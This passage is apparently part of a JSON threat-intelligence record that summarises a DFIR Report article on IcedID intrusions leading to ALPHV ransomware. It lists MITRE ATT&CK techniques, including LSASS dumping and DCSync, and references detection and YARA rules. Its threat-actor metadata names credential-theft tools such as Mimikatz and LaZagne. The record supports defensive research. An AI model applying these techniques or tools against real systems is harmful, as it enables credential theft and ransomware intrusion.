Nltest.EXE\r\n624f1f33-ee38-4bbe-9f4a-088014e0c26b: IcedID Malware Execution Patterns\r\nYara\r\nhttps://github.com/The-DFIR-Report/Yara-Rules/blob/main/24952/24952.yar\r\nMITRE ATT\u0026CK\r\nLSASS Memory - T1003.001\r\nDCSync - T1003.006\r\nSystem Network Configuration Discovery - T1016\r\nRemote System Discovery - T1018\r\nAutomated Exfiltration - T1020\r\nRemote Desktop Protocol - T1021.001\r\nSystem Owner/User Discovery - T1033\r\nData from Network Shared Drive - T1039\r\nCommonly Used Port - T1043\r\nScheduled Task - 
T1053.005\r\nPowerShell - T1059.001\r\nWindows Command Shell - T1059.003\r\nVisual Basic - T1059.005\r\nDomain Groups - T1069.002\r\nWeb Protocols - T1071.001\r\nDomain Accounts - T1078.002\r\nSystem Information Discovery - T1082\r\nFile and Directory Discovery - T1083\r\nLocal Account - T1087.001\r\nDomain Account - T1087.002\r\nNetwork Share Discovery - T1135\r\nBITS Jobs - T1197\r\nMalicious File - T1204.002\r\nData from Information Repositories - T1213\r\nRegsvr32 - T1218.010\r\nRundll32 - T1218.011\r\nRemote Access Software - T1219\r\nDomain Trust Discovery - T1482\r\nData Encrypted for Impact - T1486\r\nArchive via Utility - T1560.001\r\nPhishing - T1566\r\nService Execution - T1569.002\r\nSystem Language Discovery - T1614.001\r\nIndicator Removal: File Deletion - T1070.004\r\nInternal case #TB24952 #PR29648\r\nSource: https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://thedfirreport.com/2024/06/10/icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment/"
	],
	"report_names": [
		"icedid-brings-screenconnect-and-csharp-streamer-to-alphv-ransomware-deployment"
	],
	"threat_actors": [
		{
			"id": "610a7295-3139-4f34-8cec-b3da40add480",
			"created_at": "2023-01-06T13:46:38.608142Z",
			"updated_at": "2026-04-10T02:00:03.03764Z",
			"deleted_at": null,
			"main_name": "Cobalt",
			"aliases": [
				"Cobalt Group",
				"Cobalt Gang",
				"GOLD KINGSWOOD",
				"COBALT SPIDER",
				"G0080",
				"Mule Libra"
			],
			"source_name": "MISPGALAXY:Cobalt",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		},
		{
			"id": "bbf66d2d-3d20-4026-a2b5-56b31eb65de4",
			"created_at": "2025-08-07T02:03:25.123407Z",
			"updated_at": "2026-04-10T02:00:03.668131Z",
			"deleted_at": null,
			"main_name": "ZINC EMERSON",
			"aliases": [
				"Confucius ",
				"Dropping Elephant ",
				"EHDevel ",
				"Manul ",
				"Monsoon ",
				"Operation Hangover ",
				"Patchwork ",
				"TG-4410 ",
				"Viceroy Tiger "
			],
			"source_name": "Secureworks:ZINC EMERSON",
			"tools": [
				"Enlighten Infostealer",
				"Hanove",
				"Mac OS X KitM Spyware",
				"Proyecto2",
				"YTY Backdoor"
			],
			"source_id": "Secureworks",
			"reports": null
		},
		{
			"id": "7a8dbc5e-51a8-437a-8540-7dcb1cc110b8",
			"created_at": "2022-10-25T16:07:23.482856Z",
			"updated_at": "2026-04-10T02:00:04.627414Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"G0142"
			],
			"source_name": "ETDA:Confucius",
			"tools": [
				"ApacheStealer",
				"ByeByeShell",
				"ChatSpy",
				"Confucius",
				"MY24",
				"Sneepy",
				"remote-access-c3",
				"sctrls",
				"sip_telephone",
				"swissknife2"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "6e23ce43-e1ab-46e3-9f80-76fccf77682b",
			"created_at": "2022-10-25T16:07:23.303713Z",
			"updated_at": "2026-04-10T02:00:04.530417Z",
			"deleted_at": null,
			"main_name": "ALPHV",
			"aliases": [
				"ALPHV",
				"ALPHVM",
				"Ambitious Scorpius",
				"BlackCat Gang",
				"UNC4466"
			],
			"source_name": "ETDA:ALPHV",
			"tools": [
				"ALPHV",
				"ALPHVM",
				"BlackCat",
				"GO Simple Tunnel",
				"GOST",
				"Impacket",
				"LaZagne",
				"MEGAsync",
				"Mimikatz",
				"Munchkin",
				"Noberus",
				"PsExec",
				"Remcom",
				"RemoteCommandExecution",
				"WebBrowserPassView"
			],
			"source_id": "ETDA",
			"reports": null
		},
		{
			"id": "caf95a6f-2705-4293-9ee1-6b7ed9d9eb4c",
			"created_at": "2022-10-25T15:50:23.472432Z",
			"updated_at": "2026-04-10T02:00:05.352882Z",
			"deleted_at": null,
			"main_name": "Confucius",
			"aliases": [
				"Confucius",
				"Confucius APT"
			],
			"source_name": "MITRE:Confucius",
			"tools": [
				"WarzoneRAT"
			],
			"source_id": "MITRE",
			"reports": null
		}
	],
	"ts_created_at": 1775434120,
	"ts_updated_at": 1775792018,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.pdf",
		"text": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.txt",
		"img": "https://archive.orkl.eu/d2f3594bc3abe99b58c93498d4a80b3a84308728.jpg"
	}
}